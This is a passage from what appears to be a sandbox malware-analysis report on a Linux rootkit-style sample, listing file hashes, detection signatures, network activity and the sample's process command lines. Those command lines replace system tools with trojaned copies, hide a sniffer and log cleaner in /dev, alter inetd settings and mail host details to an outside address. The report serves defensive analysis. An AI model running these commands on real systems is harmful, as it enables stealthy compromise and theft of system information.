MD5 f6c6269029f2d6f04892f9ee0b7b3933
SHA1 0aa018c92dfc858aaf63eca5487540f09e7017e0
SHA256 6070d84d6513ca5e16ca7daf23f9ce82ac492e3debbab28e89bf72445c4de5e5
SHA512 490e45eb17f59ea2be4571ed016a4efe8c1382783a12f0a8706e5c685c3367c936c7d361c488160e67bebdc80dadc79bf43aa7cc617f49684b685bf540fbbab3

/var/spool/exim4/input/1t2jGm-0000EU-Jj-D

MD5 74224335dff2abe0a998b1f06805bfba
SHA1 8c360cb35892029092f98c46c3ee223298386e56
SHA256 da619bbacb247f4942ae47f157c9853330df09567a08fbddc6558d13262cc7e3
SHA512 629e194701d5dae54de0a58b27b190855a8358fdd7a5450559f7e0caa1e9c9a872fb217fa1914c9bc135dbf90068cf58632e7b63a0da852b2344c5a4863b7fba

/var/spool/exim4/input/hdr.898

MD5 1c91bc2b8fe5e4b2126a75477b5f11a2
SHA1 95b847a016ef750dc84b2dbaa1c8e59b5d32f79d
SHA256 4abd61a1102ded34c1c144bef2ff3d86ef8230458723f18c1340984a8d9fd001
SHA512 ef4c33b5e932db52013084204c998c23a287f6b840ec49898bc7695cf9bb4db47fa082c52ddadb2eae23f1afca97b0948006c74f55bf107c231b08dff6de46d7

/var/spool/exim4/msglog/1t2jGm-0000EU-Jj

MD5 dfb48b402911b99b2076f781c15167e3
SHA1 9bc90714a93c8825077d2082bf8e5666cbea78a4
SHA256 26f76d38be381ec91978da1c2c65086e8779ac25d73c47e48b89e3d37043d414
SHA512 9a0d6e057ae89ebca65aa09ea9800ed61d53962ed7c762d18b5d24021454f69c0d9f769c511325ff06f22b2d18c6d18cd16fe4db4a69db75000b2735c3628be1

/var/mail/user

MD5 7aac3cb8530ef5c9713885e5bccf1edf
SHA1 f5778d27d83c63243485ffa857e29e76eda9d9db
SHA256 aee2160de7249117ea7b1df6229341b61dc73685a94dc36b535837c72fede8f1
SHA512 c09a2b747681b97867c6dd48360626c2faa6add728393c489a1af6b3f3ef014a8806a160d21a67a7d93822fa37c58b15850b0eccefe23f1948cc018718540075

/var/spool/exim4/msglog/1t2jGl-0000ET-NH

MD5 882cfa1ba576b75757f379a649c96253
SHA1 755c5be3fd808ce6adef9e46660a62a8714e58cf
SHA256 f36785f4194fa85b2627cd521d73c48a99fe7d249b592635e42b1ca12da6ab6e
SHA512 246dfe97ae32943a40328cf96bbe1be19218429a8e3c2396c589b04fdf2a818186dcac1106ab8230ff7a0b6d3136fc6eb7412290e4d47828e9e584a2f9c6a005

/var/spool/exim4/msglog/1t2jGm-0000EU-Jj

MD5 a80aa0e0a1bd8fa3dd53d3854415681f
SHA1 fb3e43709d0bbc0d3a4d231bf2007b33ffffe574
SHA256 f2d77f27173f6641e57624329b818f112cd631c75c6b6c2716c942cf8dff326f
SHA512 0b2044e661376fa5be51095234074a77bd2f2b3bb04eb1d61a69b398ef91e2b7485665072be9e4d93fb797f8d54f3a003e6ba6657ff7d73a67729911b1434297

/var/spool/exim4/input/1t2jGo-0000Ed-F4-D

MD5 3a1108b0ce7b5984bc59d938a4585296
SHA1 947d7947ae20ed3c43ab3dbd693b643e05407532
SHA256 8cb2bd31ae6ef5dd60c93935355e72f2b8fefe0a3556780668e01f562f6cdc8f
SHA512 54b337a0350649aebf41378137ecd6e65f17d2c1b7b9a5a40443d0d55cc6ee6a10fb6b76485624fc8768c0ddbb4f0458675dfdc74502f9faef5ad1826d18a142

/var/spool/exim4/input/hdr.907

MD5 6a335a6b63391a1b071e6d9eba0d8616
SHA1 a1792f14340afbe82b9c4b7e555642275253a67a
SHA256 c0a70d6b8d4dd0770947e04434065e837e26fce0676ef01a358dd685e350478f
SHA512 8e85ec6f3e4639b2717b4cfeb99085b93b23bcde4de532f3295d7dcfeea837e53968e84aab9b6af95ec03d2e0290a427d3c128d4fd1ab69ec66316257a6077c9

/var/spool/exim4/msglog/1t2jGo-0000Ed-F4

MD5 a8a7118dc8c70e84db5bb36e5bed5652
SHA1 2c5545cf4c63591677d6608832f00319dc63cca2
SHA256 360150e5acc75ef1e1a393b818c18ae5028edf7cf5fcf3914a7d5d69fcdf840e
SHA512 fe04ab8bac57cb73052b53d12d2ed9f14765359870f871c1f9c8b368fe3579ecae80ccbae5f890a0827a1b432effcee8e1488c73ab216ce0ad05e4d81ac4c591

/var/spool/exim4/input/hdr.900

MD5 484c74ac02d39af1d57873d4bd54088a
SHA1 022005e2fb548d8b14414dbc90a8f093bb74521f
SHA256 8c827018ed222445ac66d8a30b3ec0d4714f33bf50a00440df8fbd9a00eb31ec
SHA512 4f6583a1872aa127815cb4303c38219a7768723a6d0a29301e34dc9488fb9abd01eaebceab9706b8ed36694820a40e9fe73351a4c0314a7143059d125c9d85a0

/var/mail/user

MD5 fec4fb676da868075ad1377020cd4db3
SHA1 3db64670976039d8a778f678023698a91106045d
SHA256 33fd4863191978a815e7f530ff8ebdc14051ddbf36ae4078d9773b81e2312893
SHA512 42eebf2d792debd96d9da242b9ae66c13218467904e85fdbd8a98db784c0a4b00a704d26f6cd27e1ccbac37465937824a1c0acc17fa7895ffa6f2365559405e5

/var/spool/exim4/msglog/1t2jGo-0000Ed-F4

MD5 3ceb6e2dc163f26b927165690cb2425c
SHA1 5b1f313aa65f57d6f30e3f0ad9a3f6615488afe2
SHA256 888c7f62582a27a69e25911086642d7ca26bf9654f3ee931ebb5adf91a2887c9
SHA512 834cffbf2d7b0f42d32ba6a309f87af75d1c0456910bfe2031833dc01f42aef5e5b7ebf3d7092305eebe184e985603b71dad39c61ce3fae32d3c1bd33812c2ac

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-21 05:39

Reported

2024-10-21 05:41

Platform

debian9-mipsel-20240418-en

Max time kernel

32s

Max time network

33s

Command Line

[/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118]

Signatures

Enumerates running processes

Virtualization/Sandbox Evasion: Time Based Evasion

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/uptime N/A
N/A N/A /usr/bin/uptime N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A
File opened for reading /proc/cpuinfo /bin/cat N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/uptime N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/uptime N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/68/stat /usr/bin/killall N/A
File opened for reading /proc/348/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/72/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/701/stat /usr/bin/killall N/A
File opened for reading /proc/166/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/uptime N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/116/cmdline /usr/bin/killall N/A
File opened for reading /proc/166/stat /usr/bin/killall N/A
File opened for reading /proc/373/stat /usr/bin/killall N/A
File opened for reading /proc/706/stat /usr/bin/killall N/A
File opened for reading /proc/708/cmdline /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/sendmail N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/705/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/346/stat /usr/bin/killall N/A
File opened for reading /proc/686/stat /usr/bin/killall N/A
File opened for reading /proc/700/stat /usr/bin/killall N/A
File opened for reading /proc/701/cmdline /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/708/cmdline /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/167/stat /usr/bin/killall N/A
File opened for reading /proc/665/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/115/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/76/stat /usr/bin/killall N/A
File opened for reading /proc/850/cmdline /usr/bin/killall N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/exim4 N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/381/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/659/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/236/stat /usr/bin/killall N/A
File opened for reading /proc/372/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/145/cmdline /usr/bin/killall N/A
File opened for reading /proc/68/stat /usr/bin/killall N/A
File opened for reading /proc/145/stat /usr/bin/killall N/A
File opened for reading /proc/318/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/116/cmdline /usr/bin/killall N/A
File opened for reading /proc/340/stat /usr/bin/killall N/A
File opened for reading /proc/850/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/filesystems /bin/cp N/A
File opened for reading /proc/71/stat /usr/bin/killall N/A
File opened for reading /proc/150/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/sbin/sendmail N/A
N/A N/A /bin/mv N/A
N/A N/A /usr/sbin/sendmail N/A
N/A N/A /bin/mv N/A
N/A N/A /bin/grep N/A
N/A N/A /usr/sbin/sendmail N/A
N/A N/A /bin/rm N/A
N/A N/A /sbin/ifconfig N/A
N/A N/A /bin/grep N/A
N/A N/A /usr/sbin/sendmail N/A
N/A N/A /bin/rm N/A
N/A N/A /sbin/ifconfig N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/muhNq3al /usr/bin/mail N/A
File opened for modification /tmp/muJn9dyP /usr/bin/mail N/A
File opened for modification /tmp/mugLMKRb /usr/bin/mail N/A
File opened for modification /tmp/mu9zWdaz /usr/bin/mail N/A
File opened for modification /tmp/muoF00gm /usr/bin/mail N/A
File opened for modification /tmp/computer /tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 N/A
File opened for modification /tmp/mujqUXVi /usr/bin/mail N/A
File opened for modification /tmp/muijdqPT /usr/bin/mail N/A
File opened for modification /tmp/mueQACFR /usr/bin/mail N/A

Processes

/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118

[/tmp/65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118]

/usr/bin/clear

[clear]

/bin/chown

[chown root.root 65ae1a65bae6f9b863a267a1b4c5c504_JaffaCakes118 systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-kYdqiw]

/bin/rm

[rm -rf /sbin/ifconfig]

/bin/mv

[mv ifconfig /sbin/ifconfig]

/bin/rm

[rm -rf /bin/netstat]

/bin/mv

[mv netstat /bin/netstat]

/bin/rm

[rm -rf /bin/ps]

/bin/mv

[mv ps /bin/ps]

/bin/rm

[rm -rf /usr/bin/top]

/bin/mv

[mv top /usr/bin/top]

/bin/cp

[cp -f mkxfs /usr/sbin/]

/usr/bin/touch

[touch /dev/rpm]

/usr/bin/touch

[touch /dev/last]

/bin/mkdir

[mkdir -p /dev/ida/.drag-on]

/bin/mkdir

[mkdir -p /dev/ida/.. ]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.. ]

/bin/rm

[rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed]

/usr/bin/touch

[touch /dev/ida/.drag-on/tcp.log]

/usr/bin/touch

[touch /dev/ida/.. /tcp.log]

/bin/cp

[cp -f inetd.conf /etc]

/bin/cp

[cp -f services /etc]

/usr/bin/killall

[killall -HUP inetd]

/bin/rm

[rm -rf /usr/bin/lsattr]

/bin/cp

[cp -f lsattr /usr/bin/]

/bin/chmod

[chmod 500 /usr/bin/lsattr]

/usr/bin/chattr

[chattr +i /usr/bin/lsattr]

/usr/bin/lsattr

[/usr/bin/lsattr]

/bin/sleep

[sleep 1]

/bin/uname

[uname -a]

/bin/hostname

[hostname -f]

/sbin/ifconfig

[/sbin/ifconfig]

/bin/grep

[grep inet]

/usr/bin/uptime

[uptime]

/bin/grep

[grep vendor_id]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep model]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep MHz]

/bin/cat

[cat /proc/cpuinfo]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep bogomips]

/bin/df

[df -h]

/bin/cat

[cat computer]

/usr/bin/mail

[mail -s placinte [email protected]]

/usr/sbin/sendmail

[/usr/sbin/sendmail -oi -f root@debian9-mipsel-20240418-en-8 -t]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGV-0000Cj-J7]

/usr/bin/mail

[mail -s roote [email protected]]

/bin/cat

[cat computer]

/usr/sbin/exim4

[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGV-0000Cj-J7]

/usr/sbin/sendmail

[/usr/sbin/sendmail -oi -f root@debian9-mipsel-20240418-en-8 -t]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGY-0000Cu-6i]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGZ-0000Cw-2A]

/bin/rm

[rm -rf last lk.tgz computer lk.tar.gz]

/usr/bin/clear

[clear]

/bin/chown

[chown root.root bin boot dev etc home initrd.img initrd.img.old lib lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinux vmlinux.old]

/usr/sbin/exim4

[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGZ-0000Cw-2A]

/bin/rm

[rm -rf /sbin/ifconfig]

/bin/mv

[mv ifconfig /sbin/ifconfig]

/bin/rm

[rm -rf /bin/netstat]

/bin/mv

[mv netstat /bin/netstat]

/bin/rm

[rm -rf /bin/ps]

/bin/mv

[mv ps /bin/ps]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGb-0000DD-Ma]

/bin/rm

[rm -rf /usr/bin/top]

/bin/mv

[mv top /usr/bin/top]

/bin/cp

[cp -f mkxfs /usr/sbin/]

/usr/bin/touch

[touch /dev/rpm]

/usr/bin/touch

[touch /dev/last]

/bin/mkdir

[mkdir -p /dev/ida/.drag-on]

/bin/mkdir

[mkdir -p /dev/ida/.. ]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/]

/bin/cp

[cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.. ]

/bin/rm

[rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed]

/usr/bin/touch

[touch /dev/ida/.drag-on/tcp.log]

/usr/bin/touch

[touch /dev/ida/.. /tcp.log]

/bin/cp

[cp -f inetd.conf /etc]

/bin/cp

[cp -f services /etc]

/usr/bin/killall

[killall -HUP inetd]

/bin/rm

[rm -rf /usr/bin/lsattr]

/bin/cp

[cp -f lsattr /usr/bin/]

/bin/chmod

[chmod 500 /usr/bin/lsattr]

/usr/bin/chattr

[chattr +i /usr/bin/lsattr]

/usr/bin/lsattr

[/usr/bin/lsattr]

/bin/sleep

[sleep 1]

/bin/uname

[uname -a]

/bin/hostname

[hostname -f]

/sbin/ifconfig

[/sbin/ifconfig]

/bin/grep

[grep inet]

/usr/bin/uptime

[uptime]

/bin/grep

[grep vendor_id]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep model]

/bin/cat

[cat /proc/cpuinfo]

/bin/cat

[cat /proc/cpuinfo]

/bin/grep

[grep MHz]

/bin/grep

[grep bogomips]

/bin/cat

[cat /proc/cpuinfo]

/bin/df

[df -h]

/usr/bin/mail

[mail -s placinte [email protected]]

/bin/cat

[cat computer]

/usr/sbin/sendmail

[/usr/sbin/sendmail -oi -f root@debian9-mipsel-20240418-en-8 -t]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGl-0000EQ-61]

/usr/bin/mail

[mail -s roote [email protected]]

/bin/cat

[cat computer]

/usr/sbin/exim4

[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGl-0000EQ-61]

/usr/sbin/sendmail

[/usr/sbin/sendmail -oi -f root@debian9-mipsel-20240418-en-8 -t]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGn-0000EW-Cv]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGn-0000EZ-P2]

/bin/rm

[rm -rf last lk.tgz computer lk.tar.gz]

/usr/sbin/exim4

[/usr/sbin/exim4 -t -oem -oi -f <> -E1t2jGn-0000EZ-P2]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t2jGp-0000En-Qq]

Network

Country Destination Domain Proto
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp
US 1.1.1.1:53 debian9-mipsel-20240418-en-8 udp

Files

/dev/rpm

MD5 4e6ac6c2a2fecfe1e88ed9ef72c2d2cd
SHA1 76015ef9244670de728b830ad330c536f42c4e39
SHA256 625d8ffa241021399ea6cf2f8f6ceaa5b19bee660bed532ef6c7dbead906917c
SHA512 1c8c0e2a26bb9cbef13ececacda94d9e8403646eb120596540bf040e672338b5c21333f1172d1822b5c87419a35437ea111324c5b0e3196d35407acf74e544f7

/dev/rpm

MD5 7d298531c8d0893706bf9c76a40f8386
SHA1 36f5cc01e0b6bcac92aa01055f3eb1bf45bf36bf
SHA256 03d0ea06da1c004ba7e1ae10d04444e235a4b8cf8451d610f771c539d1387f1a
SHA512 38f915c4921b801fe5b560fd9be4bc92705ee1376812f377d15a41bf2424f7e7324ea6cc6e103acee23940a4a8c93f1829a2b20fd5c3c22bb5542ce17d2ad973

/dev/rpm

MD5 1894a58fd103ccce773c667411597492
SHA1 248701dcabbff132054e34fd86f9afbd3746ea38
SHA256 0b3158157a0891176e648dca6743c6f62c2a0ea6c5ba7f33bc8740ae42513d12
SHA512 c3c622fcac2163a71132dc706cf26b4e87912ee9fb13b593708d6c71c8a72fcca1b34bc97e6cf6f732308ac30475b2f047e2a315162f7314c24ae65413561f9a

/dev/rpm

MD5 1d0177d6d6d055555eb272249d89f54d
SHA1 6137ecd54c6ca43dbe4bc63a030b817a94a2a5e3
SHA256 cab38856d96e2273d9ca9e8eec5c4428dea21d90fcc1005d23d43db7508b9c9e
SHA512 fad8ef62c3c5316497524e6c0101ed3e57b09ec892f902849d771d682b90430a6b7a588e1e10f8c93f01feb9f5f702bf1bcd5b8be2e12dfbcdbfec2b024e22ab

/dev/rpm

MD5 a56a4ee13c1681711fb6217ec17a8abc
SHA1 6193fa49399265b3efbc7ec47760a23749a278a3
SHA256 610c4e3a32f6e1fb38d082ed6ed86b1c0fcc42314df0e6d8f5c7ea70afb6dba4
SHA512 86d576cf220f3a37ced1348aad2d799c692a13206d1709537123a7726174481ab9cb1fcf9f5046b072ff657e4becb0ae7ee83b8d5e18ef317930fe8de2cc0ec0

/dev/last

MD5 29b9e96e561662774c048aaf62f63f99
SHA1 0765b1eaf2054c54fe82e1326617d919f5f200fc
SHA256 76025f97d8ea5be475bad1e9ba9579059ef456583b63a71fcef9bbe055e865ec
SHA512 1db52eabbd3250a830155d0ad8b486c4dbe5fbf043f9bd45b6cf8982cae4c974e4cfe862f74824e091905b79d8cde6a6c6c71541a782aaf9e917282612eb457a

/dev/last

MD5 ed90c163bc4809cfba41afe945d8c3ac
SHA1 3fc77c1038907a6540022911bb9f74ab260ed576
SHA256 1b70087ed15d011f96f1c7ee24133cdb96fa80e07d9086bac204f46663ad9954
SHA512 a2ad80478649090d1294be13b410e2434a170aa027d1e5329c30ea805b8d8c5c0e8f018cd8183c7bd2bfe7fd4ed0cd351c8ac8e78503f250cc352726a4442917

/dev/last

MD5 81ef1d399417bc7c03d5454d426e0e30
SHA1 e830de7de2fedc8688ded4335b6be7f0dcc2cf13
SHA256 6fff47dbd5fd120ab99a02baa33485f872f066beb802da8a594dabfcd43ae89b
SHA512 89551b76b13cecc8e295a11b0c9e7a334e2448202461a58f1dd14398a9f92d9b56089b285e3cfae9b950b88dc8f8aa48a812cef8bd1aa6696be51edb62adfbeb

/dev/last

MD5 ea4abc4909616408ea03fca58e9daf78
SHA1 c368533d40cbcf2d43c2b0f493bced7496fedafd
SHA256 574eb71079a9afe0d64c42a205368f6df46e1de0c98d28e3ba145045dba86ced
SHA512 92a1b480592675ff260a8659c179e788e50fbc846562ac2dbe9f5f11fbfd8bb6b3d2574c9c51a2f08ea506e5b719d4ca528ae5a1a51dd6a930425462eee4ab75

/dev/last

MD5 a2e384cb9bf939430cc6d44800052952
SHA1 3cafe08a106154033956aa6bbf2605e0ac94c290
SHA256 89558b7545ed41e4938774fac4e78696d61eb06a6f20755a2aa056becf3f8532
SHA512 61aae5e24e101efab9db03dd6118fc95252c39088310b1d1172738565a456bb11d9a5ad84df82b2346d0ba4aae10f798889fe566c4a44e48f3a376f279d72058

/tmp/computer

MD5 991a3749e8448f9388c4280d93d68eaa
SHA1 65687f79c3c142a5cce1845f940d50f0164deb01
SHA256 b0bf08a82414f37acdffe28536627254330e097ef1e2099bf318a507f8103f74
SHA512 d65502bf75763950f6306b834f5c3796b817f24004e66d1d1ebd5e0e30c0f781b950965c7498c58b3d4855e79422ae3af8297663987a14501d445814c9c7754a

/tmp/computer

MD5 71fee288dbb2805aebf7aa3970b63012
SHA1 a1d15795ebabe3c0d42f5a76a61bfba3dc10c3d1
SHA256 bc53a70657815bb8c44529f2b6a5ee13e7a2eaeb883f55842315937923723947
SHA512 12979a27b90c68f56b2476187d502319fb4ed2ce7a4eee5b94953482fc2004cfcb382f8adbc52fd748206047c4bfa982a4b6eefffd052ae53a5d08ac215568c2

/tmp/computer

MD5 e3b2c1694e3ba0017087502c8832d69d
SHA1 bb637d761ca2cd3b559bf5a471e7f3375dd90cfe
SHA256 1d49a5ca32347f9671f535b602a4d51a48db25aa703efad56d3acfe81f0c022a
SHA512 76023c80d620b0471416bdfe249f4fcdb689bd595ae995401966e039529b5459462b23b1616bf068f71003b276d0f4ad38036f7490195d1d939455cd3e4bc5d7

/tmp/computer

MD5 8a1623d829be385f0e8b9e2b2e14aa65
SHA1 99c5c9b4a2500202c339a73815cd7ca3fd1755fc
SHA256 e1790d4d133544c0d2cb4609f787fe83881d2b47f9e3d01b451aaf6decad2409
SHA512 475bc5bb057968e17948c97adac0beee9ad01ce42070308fbdc63b826b4dd5a77afa8f8f9ade775e03820488795c49a4dc5039445334e726e77d4e4cba14d70a

/tmp/computer

MD5 421f5b2da18abb7afebee0220a16fc2b
SHA1 bc9f3cf5e608def68cce6d621234215512954021
SHA256 2d3fb671e5ef51eca4fd8827d44c096252f8d011632a7744d810a4c7f285bce5
SHA512 72edc3f6d0e413acf89ba6ff66606af0cd87ba0cb895035c49c6d9200ee3dfeca0ea6d27f3accb5755a88aaf4a7b2f0af93c13b436a41be9a01f53e5242afe5b

/tmp/computer

MD5 c2b85e4ce427c230be647352425de718
SHA1 5153c23d09f723e6e23fbc369b80e92d310fe788
SHA256 8725670c1f765562f49c6d6a8667ddaf7413f3c99cc0896ba7c445ab641f0764
SHA512 37ea706b0d75cfdcc6ef389d28cba2efe6f33c0aec401d25882bc8e9ef35280fdd949b6cd52daacffac2231997c0089b9b937eeff71278e285cb10cdf8d59b70

/var/spool/exim4/input/1t2jGV-0000Cj-J7-D

MD5 6867b2817a5b5ce706eb659b42ea16b9
SHA1 3662e578ec1e6f73cbbdfca13bf1243039edae8e
SHA256 e2751675f4ab7bc46335694a9f231e16951951fbdbab5e601937aa657e9a091a
SHA512 19ce6f4244873e29b71a3840602c3b7ec6e498ba3a1edf5ebb85568611288346841d22701d9fe2a19dac65322b619e51214b448d49d8ca0fb913d704ee9032bf

/var/spool/exim4/input/hdr.789

MD5 196d55a80a93236a2749ac57029f6c2a
SHA1 728f79fa9513eb0fdf9ffe41ced43900bc5c8833
SHA256 3583914edad36cfabc8ff5898831529e43d044578a068ba5efc8e7bc76821404
SHA512 fa0cdb8b0071220ce6d0a55a0d1878ecabed2d2125dae0afecc58a92f6fb8e56925a6898a13126ff4e398055379acd586c5d0c9f2a880231d0a6bcb823ae2bb7

/var/spool/exim4/msglog/1t2jGV-0000Cj-J7

MD5 3399899be24d6533d56bb75ef3b32691
SHA1 3ec78101b0b2773c98deddb7a302e21f35c3f7cc
SHA256 be14dbc7c3727cbe1ba96163ae6e81ec37b7d87d25db18ad640139c8b5de4624
SHA512 7cccb07653ecc541fd5f2ff9fe4e138c72b821cb99a625188e71ddae02fd42e493e9d29881754d96a3c20641bed562e42e224e1670ca4a2032782af742eb3b41

/var/spool/exim4/msglog/1t2jGV-0000Cj-J7

MD5 53bf05e59a29baa8bdf2fd8c5efc5187
SHA1 67f678affc0d3345c1e937b46e55bcf84dc8ab4e
SHA256 6f3cd3b65ebf46c6a1fe1ddf23f56279124de97ace51aaee579c857131f0f30f
SHA512 6c6cff5ff3c9447ab4715ac6982b3ac950ddac83793535ea7269be07a767a2139b8c1df9b24cb561a31a52bac7d695897e5d6fc9773dda1aa3b5b2bfea9773bb

/var/spool/exim4/input/1t2jGY-0000Cu-6i-D

MD5 8dfcb4464ccfa3009eeb6196d9f285ae
SHA1 296ec18eca678959b390c0e717faf419364d8952
SHA256 2a2059086789105e2f05216da1eb6ccf164ab8369a7d07ff7ab295327630578f
SHA512 cd946d75ca91181fe350cd79c02b6b4a4466cbfee935e323bb9907a412c76e8e48739a1d4e27abfd7fd7911357a0168c2c0f863ca849ab321e4868d062bde7b6

/var/spool/exim4/input/hdr.800

MD5 d96174efe8a0f76c96e9e66148a96c3c
SHA1 6d2647e76a1001c989f2b5ee06173c19bc330b67
